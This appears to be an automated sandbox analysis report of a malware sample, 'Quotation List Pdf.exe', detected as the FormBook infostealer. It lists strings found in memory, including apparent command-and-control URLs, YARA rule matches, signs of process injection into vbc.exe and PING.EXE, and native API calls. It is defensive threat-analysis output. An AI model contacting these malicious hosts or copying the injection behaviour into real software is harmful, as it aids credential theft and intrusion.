20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0-beta+sha-d033abax-version: d033abax-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Mon, 01 Jul 2024 13:46:57 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74
Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3302954162.0000000005286000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ajjmamlllqqq.xyz
Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3302954162.0000000005286000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ajjmamlllqqq.xyz/5lw2/
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/nativeaot-c
Source: Quotation List Pdf.exe, 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: Quotation List Pdf.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: PING.EXE, 00000007.00000003.1737775029.00000000084B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033aFR
Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://track.uc.cn/collect
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: PING.EXE, 00000007.00000002.3302803643.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.00000000031C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000023104000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1
Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Quotation List Pdf.exe
Uses regedit.exe to modify the Windows registry
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_0042B323 NtClose, 5_2_0042B323
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058535C0 NtCreateMutant,LdrInitializeThunk, 5_2_058535C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_05852DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_05852C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852B60 NtClose,LdrInitializeThunk, 5_2_05852B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05854650 NtSuspendThread, 5_2_05854650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05853090 NtSetValueKey, 5_2_05853090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05853010 NtOpenDirectoryObject, 5_2_05853010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05854340 NtSetContextThread, 5_2_05854340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852DB0 NtEnumerateKey, 5_2_05852DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852DD0 NtDelayExecution, 5_2_05852DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852D00 NtSetInformationFile, 5_2_05852D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852D10 NtMapViewOfSection, 5_2_05852D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05853D10 NtOpenProcessToken, 5_2_05853D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852D30 NtUnmapViewOfSection, 5_2_05852D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05853D70 NtOpenThread, 5_2_05853D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852CA0 NtQueryInformationToken, 5_2_05852CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852CC0 NtQueryVirtualMemory, 5_2_05852CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852CF0 NtOpenProcess, 5_2_05852CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852C00 NtQueryInformationProcess, 5_2_05852C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852C60 NtCreateKey, 5_2_05852C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852F90 NtProtectVirtualMemory, 5_2_05852F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852FA0 NtQuerySection, 5_2_05852FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852FB0 NtResumeThread, 5_2_05852FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852FE0 NtCreateFile, 5_2_05852FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852F30 NtCreateSection, 5_2_05852F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852F60 NtCreateProcessEx, 5_2_05852F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852E80 NtReadVirtualMemory, 5_2_05852E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852EA0 NtAdjustPrivilegesToken, 5_2_05852EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852EE0 NtQueueApcThread, 5_2_05852EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852E30 NtWriteVirtualMemory, 5_2_05852E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_058539B0 NtGetContextThread, 5_2_058539B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852B80 NtQueryInformationFile, 5_2_05852B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852BA0 NtEnumerateValueKey, 5_2_05852BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852BE0 NtQueryValueKey, 5_2_05852BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852BF0 NtAllocateVirtualMemory, 5_2_05852BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852AB0 NtWaitForSingleObject, 5_2_05852AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852AD0 NtReadFile, 5_2_05852AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 5_2_05852AF0 NtWriteFile, 5_2_05852AF0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03884340 NtSetContextThread,LdrInitializeThunk, 7_2_03884340
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03884650 NtSuspendThread,LdrInitializeThunk, 7_2_03884650
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038835C0 NtCreateMutant,LdrInitializeThunk, 7_2_038835C0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882B60 NtClose,LdrInitializeThunk, 7_2_03882B60
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882AD0 NtReadFile,LdrInitializeThunk, 7_2_03882AD0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882AF0 NtWriteFile,LdrInitializeThunk, 7_2_03882AF0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_038839B0 NtGetContextThread,LdrInitializeThunk, 7_2_038839B0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882FB0 NtResumeThread,LdrInitializeThunk, 7_2_03882FB0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882FE0 NtCreateFile,LdrInitializeThunk, 7_2_03882FE0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882F30 NtCreateSection,LdrInitializeThunk, 7_2_03882F30
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_03882EE0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882DD0 NtDelayExecution,LdrInitializeThunk, 7_2_03882DD0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_03882DF0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_03882D10
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_03882D30
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_03882CA0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882C60 NtCreateKey,LdrInitializeThunk, 7_2_03882C60
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_03882C70
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03883090 NtSetValueKey, 7_2_03883090
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03883010 NtOpenDirectoryObject, 7_2_03883010
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882B80 NtQueryInformationFile, 7_2_03882B80
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882BA0 NtEnumerateValueKey, 7_2_03882BA0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882BE0 NtQueryValueKey, 7_2_03882BE0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882BF0 NtAllocateVirtualMemory, 7_2_03882BF0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882AB0 NtWaitForSingleObject, 7_2_03882AB0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882F90 NtProtectVirtualMemory, 7_2_03882F90
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882FA0 NtQuerySection, 7_2_03882FA0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882F60 NtCreateProcessEx, 7_2_03882F60
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882E80 NtReadVirtualMemory, 7_2_03882E80
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882EA0 NtAdjustPrivilegesToken, 7_2_03882EA0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882E30 NtWriteVirtualMemory, 7_2_03882E30
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882DB0 NtEnumerateKey, 7_2_03882DB0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882D00 NtSetInformationFile, 7_2_03882D00
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03883D10 NtOpenProcessToken, 7_2_03883D10
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03883D70 NtOpenThread, 7_2_03883D70
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882CC0 NtQueryVirtualMemory, 7_2_03882CC0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882CF0 NtOpenProcess, 7_2_03882CF0
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_03882C00 NtQueryInformationProcess, 7_2_03882C00
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030A8000 NtClose, 7_2_030A8000
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030A7F60 NtDeleteFile, 7_2_030A7F60
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030A7E70 NtReadFile, 7_2_030A7E70
Source: C:\Windows\SysWOW64\PING.EXE Code function: 7_2_030A7D10 NtCreateFile, 7_2_030A7D10
Detected potential crypto function
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684621B0 0_2_00007FF7684621B0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684638B0 0_2_00007FF7684638B0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768443130 0_2_00007FF768443130
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684481F0 0_2_00007FF7684481F0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684631E0 0_2_00007FF7684631E0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684671B0 0_2_00007FF7684671B0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684629B0 0_2_00007FF7684629B0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF7684339D0 0_2_00007FF7684339D0
Source: C:\Users\user\Desktop\Quotation List Pdf.exe Code function: 0_2_00007FF768449A90 0_2_00007FF768449A90
